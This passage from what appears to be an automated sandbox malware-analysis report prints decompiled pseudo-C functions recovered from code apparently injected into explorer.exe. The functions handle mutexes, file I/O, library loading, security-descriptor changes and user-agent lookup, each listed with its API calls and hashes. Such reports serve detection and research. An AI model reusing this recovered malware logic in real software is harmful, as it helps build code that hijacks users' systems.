                                          					} else {
                                          						goto L3;
                                          					}
                                          				} else {
                                          					_t36 = E00082DCB();
                                          					_t63 = _t36;
                                          					if(_t36 != 0) {
                                          						L3:
                                          						_t33 = 1;
                                          					} else {
                                          						goto L2;
                                          					}
                                          				}
                                          				return _t33;
                                          			}

                                          APIs
                                          • CreateMutexA.KERNELBASE(00000000,00000000,00000000), ref: 000856D0
                                            • Part of subcall function 0008980C: GetSystemTimeAsFileTime.KERNEL32(?,?,00085FAF), ref: 00089819
                                            • Part of subcall function 0008980C: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00089839
                                          • Sleep.KERNELBASE(00000FA0), ref: 0008574A
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.888209871.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Time$CreateFileMutexSleepSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                                          • String ID:
                                          • API String ID: 3249252070-0
                                          • Opcode ID: fd4bb5a668434b88d5c04a99dfde256102c0f641a73eee2e9a85173188a96518
                                          • Instruction ID: 618d9e32d6944c2961c1c58ef027407fe41e2fb87ac27e57644674ab890b217f
                                          • Opcode Fuzzy Hash: fd4bb5a668434b88d5c04a99dfde256102c0f641a73eee2e9a85173188a96518
                                          • Instruction Fuzzy Hash: 0031D6312056509BF724FBB5EC069EA3B99FF557A0B144126F5C9861A3EE349900C763
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 26%
                                          			E0008A6A9(void* __ecx, signed int _a4, intOrPtr* _a8) {
                                          				intOrPtr _v8;
                                          				char _v12;
                                          				intOrPtr _t26;
                                          				intOrPtr _t27;
                                          				intOrPtr _t29;
                                          				intOrPtr* _t39;
                                          				void* _t47;
                                          				intOrPtr _t55;
                                          				intOrPtr _t58;
                                          				char _t60;
                                          
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_t50 = _a4;
                                          				_t60 = 0;
                                          				_v12 = 0;
                                          				if(_a4 != 0) {
                                          					_t47 = E0008A63B(_t50);
                                          					if(_t47 == 0) {
                                          						L11:
                                          						_t26 = 0;
                                          						L12:
                                          						L13:
                                          						return _t26;
                                          					}
                                          					_t27 =  *0x9e684; // 0x34f8f0
                                          					_t58 =  *((intOrPtr*)(_t27 + 0xe8))(_t47, 0);
                                          					if(_t58 == 0) {
                                          						L9:
                                          						_t29 =  *0x9e684; // 0x34f8f0
                                          						 *((intOrPtr*)(_t29 + 0x30))(_t47);
                                          						if(_t60 != 0) {
                                          							E0008861A( &_v12, 0);
                                          						}
                                          						goto L11;
                                          					}
                                          					_t4 = _t58 + 1; // 0x1
                                          					_t60 = E00088604(_t4);
                                          					_v12 = _t60;
                                          					if(_t60 == 0) {
                                          						goto L9;
                                          					}
                                          					_a4 = _a4 & 0;
                                          					_push(0);
                                          					_v8 = 0;
                                          					_push( &_a4);
                                          					_push(_t58);
                                          					_push(_t60);
                                          					while(ReadFile(_t47, ??, ??, ??, ??) != 0) {
                                          						if(_a4 == 0) {
                                          							if(_v8 != _t58) {
                                          								goto L9;
                                          							}
                                          							_t39 = _a8;
                                          							 *((char*)(_t58 + _t60)) = 0;
                                          							if(_t39 != 0) {
                                          								 *_t39 = _t58;
                                          							}
                                          							CloseHandle(_t47);
                                          							_t26 = _t60;
                                          							goto L12;
                                          						}
                                          						_t55 = _v8 + _a4;
                                          						_a4 = _a4 & 0x00000000;
                                          						_push(0);
                                          						_push( &_a4);
                                          						_v8 = _t55;
                                          						_push(_t58 - _t55);
                                          						_push(_t55 + _t60);
                                          					}
                                          					goto L9;
                                          				}
                                          				_t26 = 0;
                                          				goto L13;
                                          			}

                                          APIs
                                          • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,0008FA56,00000000,0008F8B5,000AEFE0,0009B990,00000000,0009B990,00000000,00000000,00000615), ref: 0008A733
                                          • CloseHandle.KERNELBASE(00000000,?,0008FA56,00000000,0008F8B5,000AEFE0,0009B990,00000000,0009B990,00000000,00000000,00000615,0000034A,00000000,0034FD30,00000400), ref: 0008A776
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.888209871.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CloseFileHandleRead
                                          • String ID:
                                          • API String ID: 2331702139-0
                                          • Opcode ID: a34129b748d1e948e0603bfe7886cfa0a731461f5cd668a30662b867c12b276b
                                          • Instruction ID: 682a662acdfee72883915282426476a47a31b64306a9f0d0b2be5f1f474e3a22
                                          • Opcode Fuzzy Hash: a34129b748d1e948e0603bfe7886cfa0a731461f5cd668a30662b867c12b276b
                                          • Instruction Fuzzy Hash: DE218D76B04205AFEB50EF64CC84FAA77FCBB05744F10806AF946DB642E770D9409B91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 76%
                                          			E0008153B(void* __ecx, void* __edx) {
                                          				void* _v8;
                                          				void* _t3;
                                          				signed int _t4;
                                          				intOrPtr _t7;
                                          				signed int _t9;
                                          				intOrPtr _t10;
                                          				void* _t24;
                                          
                                          				_push(__ecx);
                                          				_t3 = CreateMutexA(0, 0, 0);
                                          				 *0x9e6f4 = _t3;
                                          				if(_t3 == 0) {
                                          					L11:
                                          					_t4 = _t3 | 0xffffffff;
                                          					__eflags = _t4;
                                          				} else {
                                          					_t3 = CreateMutexA(0, 0, 0);
                                          					 *0x9e6dc = _t3;
                                          					if(_t3 == 0) {
                                          						goto L11;
                                          					} else {
                                          						_t3 = E00081080(0x4ac);
                                          						_v8 = _t3;
                                          						if(_t3 == 0) {
                                          							goto L11;
                                          						} else {
                                          							 *0x9e6e8 = E000891A6(_t3, 0);
                                          							E000885C2( &_v8);
                                          							_t7 = E00088604(0x100);
                                          							 *0x9e6f0 = _t7;
                                          							if(_t7 != 0) {
                                          								 *0x9e6fc = 0;
                                          								_t9 = E00088604(0x401);
                                          								 *0x9e6d4 = _t9;
                                          								__eflags = _t9;
                                          								if(_t9 != 0) {
                                          									__eflags =  *0x9e6c0; // 0x0
                                          									if(__eflags == 0) {
                                          										E000915B6(0x88202, 0x8820b);
                                          									}
                                          									_push(0x61e);
                                          									_t24 = 8;
                                          									_t10 = E0008E1BC(0x9bd28, _t24); // executed
                                          									 *0x9e6a0 = _t10;
                                          									_t4 = 0;
                                          								} else {
                                          									_push(0xfffffffc);
                                          									goto L5;
                                          								}
                                          							} else {
                                          								_push(0xfffffffe);
                                          								L5:
                                          								_pop(_t4);
                                          							}
                                          						}
                                          					}
                                          				}
                                          				return _t4;
                                          			}

                                          APIs
                                          • CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,00085707), ref: 00081545
                                          • CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,00085707), ref: 0008155B
                                            • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.888209871.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateMutex$AllocateHeap
                                          • String ID:
                                          • API String ID: 704353917-0
                                          • Opcode ID: 7c5440741e29b163d5f23002852b46c6bf079362bade3a3716c064fcde357f5f
                                          • Instruction ID: ebe42fdb1850e6894ca3f7a01c19cd8768a376f5bc184f032faea728c04dbff3
                                          • Opcode Fuzzy Hash: 7c5440741e29b163d5f23002852b46c6bf079362bade3a3716c064fcde357f5f
                                          • Instruction Fuzzy Hash: A111C871604A82AAFB60FB76EC059AA36E8FFD17B0760462BE5D1D51D1FF74C8018710
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 82%
                                          			E00085974(void* __ecx, void* __edx, void* __eflags) {
                                          				void* _v8;
                                          				char _v12;
                                          				char _v52;
                                          				intOrPtr _t16;
                                          				void* _t19;
                                          				intOrPtr _t27;
                                          				void* _t42;
                                          
                                          				_t42 = __edx;
                                          				_v8 = 0;
                                          				E0008A86D( &_v52, __ecx, __eflags);
                                          				_t16 =  *0x9e688; // 0xb0000
                                          				if( *((intOrPtr*)(_t16 + 0x644)) > 0) {
                                          					L1:
                                          					_t27 =  *0x9e684; // 0x34f8f0
                                          					 *((intOrPtr*)(_t27 + 0xb4))(0x32);
                                          					goto L1;
                                          				}
                                          				_push(0);
                                          				_push( &_v52);
                                          				_push("\\");
                                          				_v12 = E00089292("Global");
                                          				_t19 = E0008590C(_t18, _t42,  &_v8); // executed
                                          				__eflags = _t19 - 1;
                                          				if(_t19 == 1) {
                                          					CloseHandle(_v8);
                                          					_v8 = 0;
                                          					E0008590C( &_v52, _t42,  &_v8); // executed
                                          				}
                                          				E0008861A( &_v12, 0xffffffff);
                                          				return _v8;
                                          			}

                                          APIs
                                          • CloseHandle.KERNELBASE(00085DD4,?,?,?,?,00000002), ref: 000859DD
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.888209871.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CloseHandle
                                          • String ID: Global
                                          • API String ID: 2962429428-4020866741
                                          • Opcode ID: aca2857cd06624d21f417f9f9489c735cf79b42b59a9276bf8b949286003dd4b
                                          • Instruction ID: ad9e46771b38e1f6345cb022d52bc1c5a3711b7f461b92f87be1531e78fdffdd
                                          • Opcode Fuzzy Hash: aca2857cd06624d21f417f9f9489c735cf79b42b59a9276bf8b949286003dd4b
                                          • Instruction Fuzzy Hash: 42117C72A04118EBDB00FB98ED45CDDB7F8FB90321F20006AF485E7292EA309E00CB51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 47%
                                          			E0008E1BC(void* __ecx, void* __edx, intOrPtr _a4) {
                                          				char _v8;
                                          				char _t5;
                                          				struct HINSTANCE__* _t7;
                                          				void* _t10;
                                          				void* _t12;
                                          				void* _t22;
                                          				void* _t25;
                                          
                                          				_push(__ecx);
                                          				_t12 = __ecx;
                                          				_t22 = __edx;
                                          				_t5 = E000895C7(_a4);
                                          				_t25 = 0;
                                          				_v8 = _t5;
                                          				_push(_t5);
                                          				if(_a4 != 0x7c3) {
                                          					_t7 = LoadLibraryA(); // executed
                                          				} else {
                                          					_t7 = GetModuleHandleA();
                                          				}
                                          				if(_t7 != 0) {
                                          					_t10 = E0008E171(_t12, _t22, _t7); // executed
                                          					_t25 = _t10;
                                          				}
                                          				E000885C2( &_v8);
                                          				return _t25;
                                          			}

                                          APIs
                                          • GetModuleHandleA.KERNEL32(00000000,00000000,00000001,?,0009BA28), ref: 0008E1DE
                                          • LoadLibraryA.KERNEL32(00000000,00000000,00000001,?,0009BA28), ref: 0008E1EB
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.888209871.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: HandleLibraryLoadModule
                                          • String ID:
                                          • API String ID: 4133054770-0
                                          • Opcode ID: 34ee8c9432c501ef63b31a96de4864626031fe048823fd25d1229eb6e9450f54
                                          • Instruction ID: eaac88a08efcd0d2a3f1dbc0b3101d04e6d50373736468e8fc033cf0e2f21452
                                          • Opcode Fuzzy Hash: 34ee8c9432c501ef63b31a96de4864626031fe048823fd25d1229eb6e9450f54
                                          • Instruction Fuzzy Hash: EBF0EC32700114ABDB44BB6DDC898AEB7EDBF54790714403AF406D3251DE70DE0087A0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 65%
                                          			E00082C8F(void* __ecx, void* __edx, void* __eflags, void* __fp0) {
                                          				WCHAR* _v8;
                                          				char _v12;
                                          				char _v44;
                                          				char _v564;
                                          				char _v1084;
                                          				void* __esi;
                                          				void* _t23;
                                          				struct _SECURITY_ATTRIBUTES* _t25;
                                          				int _t27;
                                          				char _t32;
                                          				char _t38;
                                          				intOrPtr _t39;
                                          				void* _t40;
                                          				WCHAR* _t41;
                                          				void* _t54;
                                          				char* _t60;
                                          				char* _t63;
                                          				void* _t70;
                                          				WCHAR* _t71;
                                          				intOrPtr* _t73;
                                          
                                          				_t70 = __ecx;
                                          				_push(__ecx);
                                          				E0008B700(__edx,  &_v44, __eflags, __fp0);
                                          				_t52 = _t70;
                                          				if(E0008BB8D(_t70) == 0) {
                                          					_t23 = E00082BA4( &_v1084, _t70, 0x104); // executed
                                          					_pop(_t54);
                                          					__eflags = _t23;
                                          					if(__eflags == 0) {
                                          						_t71 = E00082C64( &_v1084, __eflags);
                                          					} else {
                                          						E0008B012(_t54,  &_v564); // executed
                                          						_t32 = E0008109A(_t54, 0x375);
                                          						_push(0);
                                          						_v12 = _t32;
                                          						_push( &_v44);
                                          						_t60 = "\\";
                                          						_push(_t60);
                                          						_push(_t32);
                                          						_push(_t60);
                                          						_push( &_v564);
                                          						_push(_t60);
                                          						_t71 = E000892E5( &_v1084);
                                          						E000885D5( &_v12);
                                          					}
                                          				} else {
                                          					_t38 = E0008109A(_t52, 0x4e0);
                                          					 *_t73 = 0x104;
                                          					_v12 = _t38;
                                          					_t39 =  *0x9e684; // 0x34f8f0
                                          					_t40 =  *((intOrPtr*)(_t39 + 0xe0))(_t38,  &_v564);
                                          					_t78 = _t40;
                                          					if(_t40 != 0) {
                                          						_t41 = E0008109A( &_v564, 0x375);
                                          						_push(0);
                                          						_v8 = _t41;
                                          						_push( &_v44);
                                          						_t63 = "\\";
                                          						_push(_t63);
                                          						_push(_t41);
                                          						_push(_t63);
                                          						_t71 = E000892E5( &_v564);
                                          						E000885D5( &_v8);
                                          					} else {
                                          						_t71 = E00082C64( &_v44, _t78);
                                          					}
                                          					E000885D5( &_v12);
                                          				}
                                          				_v8 = _t71;
                                          				_t25 = E0008B269(_t71);
                                          				if(_t25 == 0) {
                                          					_t27 = CreateDirectoryW(_t71, _t25); // executed
                                          					if(_t27 == 0 || E0008B269(_t71) == 0) {
                                          						E0008861A( &_v8, 0xfffffffe);
                                          						_t71 = _v8;
                                          					}
                                          				}
                                          				return _t71;
                                          			}
























                                          APIs
                                          • CreateDirectoryW.KERNELBASE(00000000,00000000,00000000), ref: 00082DA1
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.888209871.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateDirectory
                                          • String ID:
                                          • API String ID: 4241100979-0
                                          • Opcode ID: 9f56370e500a6f4cfac612b82a016e3664746281a383755eb8493c24e85cfb68
                                          • Instruction ID: 661ddabdbbf5835fe1c09d22864260864737aa38d39f94c9f57271a24964c515
                                          • Opcode Fuzzy Hash: 9f56370e500a6f4cfac612b82a016e3664746281a383755eb8493c24e85cfb68
                                          • Instruction Fuzzy Hash: D931A4B1914314AADB24FBA4CC51AFE77ACBF04350F040169F985E3182EF749F408BA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E00085AFF(intOrPtr __edx, void* __fp0) {
                                          				short _v30;
                                          				short _v32;
                                          				short _v34;
                                          				short _v36;
                                          				intOrPtr* _t22;
                                          				intOrPtr _t23;
                                          				signed int _t30;
                                          				intOrPtr _t38;
                                          				intOrPtr* _t40;
                                          				intOrPtr _t44;
                                          				intOrPtr _t45;
                                          				intOrPtr* _t46;
                                          				signed int _t47;
                                          				void* _t55;
                                          
                                          				_t55 = __fp0;
                                          				_t45 = __edx;
                                          				_t47 = 0;
                                          				_t22 = E00088604(0x14);
                                          				_t38 =  *0x9e688; // 0xb0000
                                          				_t46 = _t22;
                                          				if( *((short*)(_t38 + 0x22a)) == 0x3a) {
                                          					_v36 =  *((intOrPtr*)(_t38 + 0x228));
                                          					_v34 =  *((intOrPtr*)(_t38 + 0x22a));
                                          					_v32 =  *((intOrPtr*)(_t38 + 0x22c));
                                          					_v30 = 0;
                                          					GetDriveTypeW( &_v36); // executed
                                          				}
                                          				 *_t46 = 2;
                                          				 *(_t46 + 4) = _t47;
                                          				_t23 =  *0x9e688; // 0xb0000
                                          				 *((intOrPtr*)(_t46 + 8)) =  *((intOrPtr*)(_t23 + 0x224));
                                          				_t40 = E00085A7B( *((intOrPtr*)(_t23 + 0x224)), _t45, _t55);
                                          				 *((intOrPtr*)(_t46 + 0xc)) = _t40;
                                          				if(_t40 == 0) {
                                          					L9:
                                          					if(E00082DCB() == 0) {
                                          						goto L11;
                                          					} else {
                                          						_t47 = _t47 | 0xffffffff;
                                          					}
                                          				} else {
                                          					_t45 =  *_t40;
                                          					_t30 = _t47;
                                          					if(_t45 == 0) {
                                          						goto L9;
                                          					} else {
                                          						_t44 =  *((intOrPtr*)(_t40 + 4));
                                          						while( *((intOrPtr*)(_t44 + _t30 * 8)) != 0x3b) {
                                          							_t30 = _t30 + 1;
                                          							if(_t30 < _t45) {
                                          								continue;
                                          							} else {
                                          								goto L9;
                                          							}
                                          							goto L12;
                                          						}
                                          						if( *((intOrPtr*)(_t44 + 4 + _t30 * 8)) != _t47) {
                                          							L11:
                                          							E00084D6D(_t46, _t45, _t55);
                                          						} else {
                                          							goto L9;
                                          						}
                                          					}
                                          				}
                                          				L12:
                                          				E0008A39E();
                                          				E0008A39E();
                                          				return _t47;
                                          			}


















                                          APIs
                                            • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                                          • GetDriveTypeW.KERNELBASE(?), ref: 00085B4F
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.888209871.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateDriveHeapType
                                          • String ID:
                                          • API String ID: 414167704-0
                                          • Opcode ID: cb03de1a2ba3e6c236d1db646638ddc4e840487864a8cce90740a25b4b3f0c80
                                          • Instruction ID: 556f522260d7e6bdf941df906934654c795a6f01da19a51ea332bd0742bdc193
                                          • Opcode Fuzzy Hash: cb03de1a2ba3e6c236d1db646638ddc4e840487864a8cce90740a25b4b3f0c80
                                          • Instruction Fuzzy Hash: C4213638600B169BC714BFA4DC489ADB7B0FF58325B24813EE49587392FB32C842CB85
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 44%
                                          			E0008BC7A(void* __ecx, void* __edx) {
                                          				char _v8;
                                          				char _v12;
                                          				char _v16;
                                          				char _v20;
                                          				char _v24;
                                          				char _t18;
                                          				intOrPtr _t19;
                                          				intOrPtr _t27;
                                          				intOrPtr _t30;
                                          				intOrPtr _t36;
                                          				intOrPtr _t38;
                                          				char _t39;
                                          
                                          				_t39 = 0;
                                          				_t38 =  *0x9e674; // 0x1e4
                                          				_v8 = 0;
                                          				_v12 = 0;
                                          				_v20 = 0;
                                          				_v16 = 0;
                                          				_t18 = E000895E1(__ecx, 0x84b);
                                          				_push(0);
                                          				_v24 = _t18;
                                          				_push( &_v8);
                                          				_push(1);
                                          				_push(_t18);
                                          				_t19 =  *0x9e68c; // 0x34fab8
                                          				if( *((intOrPtr*)(_t19 + 0x84))() != 0) {
                                          					_push( &_v16);
                                          					_push( &_v12);
                                          					_push( &_v20);
                                          					_t27 =  *0x9e68c; // 0x34fab8
                                          					_push(_v8);
                                          					if( *((intOrPtr*)(_t27 + 0x88))() != 0) {
                                          						_push(_v12);
                                          						_t30 =  *0x9e68c; // 0x34fab8
                                          						_push(0);
                                          						_push(0);
                                          						_push(0);
                                          						_push(0x10);
                                          						_push(6);
                                          						_push(_t38); // executed
                                          						if( *((intOrPtr*)(_t30 + 0x8c))() == 0) {
                                          							_t39 = 1;
                                          						}
                                          					}
                                          					_t36 =  *0x9e68c; // 0x34fab8
                                          					 *((intOrPtr*)(_t36 + 0x10))(_v8);
                                          				}
                                          				E000885D5( &_v24);
                                          				return _t39;
                                          			}
















                                          APIs
                                          • SetSecurityInfo.ADVAPI32(000001E4,00000006,00000010,00000000,00000000,00000000,?,?,00083268,?,?,00000000,?,?,?,00085721), ref: 0008BCE9
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.888209871.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: InfoSecurity
                                          • String ID:
                                          • API String ID: 3528565900-0
                                          • Opcode ID: 49105266334ca50b45e4c17bdeae0f8f274821862b6dd8d3608f6b368af892b6
                                          • Instruction ID: 4b82ffe8c45477c1650446b5343723a2aeaa491c0a074740823efd8a3710dd5b
                                          • Opcode Fuzzy Hash: 49105266334ca50b45e4c17bdeae0f8f274821862b6dd8d3608f6b368af892b6
                                          • Instruction Fuzzy Hash: 54113A72A00219BBDB10EF95DC49EEEBBBCFF04740F1040A6B545E7151DBB09A01CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 71%
                                          			E0008E450(void* __ecx, void* __edx) {
                                          				char _v8;
                                          				intOrPtr* _t5;
                                          				intOrPtr _t10;
                                          				intOrPtr* _t11;
                                          				void* _t12;
                                          
                                          				_push(__ecx);
                                          				_t5 =  *0x9e6b0; // 0x32f530
                                          				if( *_t5 == 0) {
                                          					_v8 = E000895C7(0x2a7);
                                          					 *0x9e788 = E000891A6(_t6, 0);
                                          					E000885C2( &_v8);
                                          					goto L4;
                                          				} else {
                                          					_v8 = 0x100;
                                          					_t10 = E00088604(0x101);
                                          					 *0x9e788 = _t10;
                                          					_t11 =  *0x9e6b0; // 0x32f530
                                          					_t12 =  *_t11(0, _t10,  &_v8); // executed
                                          					if(_t12 == 0) {
                                          						L4:
                                          						return 0;
                                          					} else {
                                          						return E0008861A(0x9e788, 0xffffffff) | 0xffffffff;
                                          					}
                                          				}
                                          			}









                                          APIs
                                            • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                                          • ObtainUserAgentString.URLMON(00000000,00000000,00000100,00000100,?,0008E4F7), ref: 0008E481
                                            • Part of subcall function 0008861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 00088660
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.888209871.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$AgentAllocateFreeObtainStringUser
                                          • String ID:
                                          • API String ID: 471734292-0
                                          • Opcode ID: b424cfbd32e5a4a4fc9b59087bcc82cf40a6a26874494f9add4b8dc47a0913b5
                                          • Instruction ID: f91671ab82a028632dec16c50dcaaaafc6d594eba443ed6fbe21b10f95aa2484
                                          • Opcode Fuzzy Hash: b424cfbd32e5a4a4fc9b59087bcc82cf40a6a26874494f9add4b8dc47a0913b5
                                          • Instruction Fuzzy Hash: 76F0CD30608240EBFB84FBB4DC4AAA977E0BB10324F644259F056D32D2EEB49D009715
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 88%
                                          			E0008A65C(void* __ecx, void* __edx, intOrPtr _a4) {
                                          				long _v8;
                                          				void* _v12;
                                          				void* _t13;
                                          				void* _t21;
                                          				void* _t23;
                                          				void* _t26;
                                          
                                          				_t23 = __ecx;
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_t26 = 0;
                                          				_v12 = __ecx;
                                          				_t21 = __edx;
                                          				if(_a4 == 0) {
                                          					L3:
                                          					_t13 = 1;
                                          				} else {
                                          					while(1) {
                                          						_v8 = _v8 & 0x00000000;
                                          						if(WriteFile(_t23, _t26 + _t21, _a4 - _t26,  &_v8, 0) == 0) {
                                          							break;
                                          						}
                                          						_t26 = _t26 + _v8;
                                          						_t23 = _v12;
                                          						if(_t26 < _a4) {
                                          							continue;
                                          						} else {
                                          							goto L3;
                                          						}
                                          						goto L4;
                                          					}
                                          					_t13 = 0;
                                          				}
                                          				L4:
                                          				return _t13;
                                          			}










                                          APIs
                                          • WriteFile.KERNELBASE(00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00088F51,?), ref: 0008A689
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.888209871.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FileWrite
                                          • String ID:
                                          • API String ID: 3934441357-0
                                          • Opcode ID: 5df19e21d3ddb09ad6c4c11454da19da2bcff3529875a62912f8edc0b597093c
                                          • Instruction ID: 0b494a87cdc3703bbe533562170335e27c5b07854cca77c3918aadfd965e8834
                                          • Opcode Fuzzy Hash: 5df19e21d3ddb09ad6c4c11454da19da2bcff3529875a62912f8edc0b597093c
                                          • Instruction Fuzzy Hash: 3EF01D72A10128BFEB10DF98C884BAA7BECFB05781F14416AB545E7144E670EE4087A1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E0008A5F7(WCHAR* __ecx, long __edx) {
                                          				intOrPtr _t6;
                                          				long _t12;
                                          				void* _t13;
                                          
                                          				_t12 = __edx;
                                          				_t13 = CreateFileW(__ecx, 0x40000000, 0, 0, __edx, 0x80, 0);
                                          				if(_t13 != 0xffffffff) {
                                          					if(_t12 == 4) {
                                          						_t6 =  *0x9e684; // 0x34f8f0
                                          						 *((intOrPtr*)(_t6 + 0x80))(_t13, 0, 0, 2);
                                          					}
                                          					return _t13;
                                          				}
                                          				return 0;
                                          			}







                                          APIs
                                          • CreateFileW.KERNELBASE(00000000,40000000,00000000,00000000,00000001,00000080,00000000,00000000,00000000,00000000,00088F39), ref: 0008A612
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.888209871.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID:
                                          • API String ID: 823142352-0
                                          • Opcode ID: b3b88b4ae18cf6f2a9577180b67bb23ad81d8c5397a9feafbeb8474c43ba8e57
                                          • Instruction ID: b222d3866c60dc690caa0f3d26d08f48d1805b8db722e2ad4e11b8f14bdb970b
                                          • Opcode Fuzzy Hash: b3b88b4ae18cf6f2a9577180b67bb23ad81d8c5397a9feafbeb8474c43ba8e57
                                          • Instruction Fuzzy Hash: C1E0DFB23000147FFB206A689CC8F7B26ACF7967F9F060232F691C3290D6208C014371
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 68%
                                          			E0008A63B(WCHAR* __ecx) {
                                          				signed int _t5;
                                          
                                          				_t5 = CreateFileW(__ecx, 0x80000000, 1, 0, 3, 0, 0);
                                          				_t2 = _t5 + 1; // 0x1
                                          				asm("sbb ecx, ecx");
                                          				return _t5 &  ~_t2;
                                          			}





                                          APIs
                                          • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000,0008A6C9,00000000,00000400,00000000,0008F8B5,0008F8B5,?,0008FA56,00000000), ref: 0008A64F
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.888209871.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID:
                                          • API String ID: 823142352-0
                                          • Opcode ID: bae718c7ab4e0e70489fab14bbe76478ebf5004892df9015de5de8492d217ac9
                                          • Instruction ID: 701424f55706607c20a779b1f605f6a3a9bf58f01b0c22295887d68b81bdb902
                                          • Opcode Fuzzy Hash: bae718c7ab4e0e70489fab14bbe76478ebf5004892df9015de5de8492d217ac9
                                          • Instruction Fuzzy Hash: FCD012B23A0100BEFB2C8B34CD5AF72329CE710701F22025C7A06EA0E1CA69E9048720
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E00088604(long _a4) {
                                          				void* _t2;
                                          
                                          				_t2 = RtlAllocateHeap( *0x9e768, 8, _a4); // executed
                                          				return _t2;
                                          			}





                                          APIs
                                          • RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.888209871.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID:
                                          • API String ID: 1279760036-0
                                          • Opcode ID: ddb3e1c4ab0669bcfb8209207dba11c67ad5171ec27cd050d23215c9b0b1c0cb
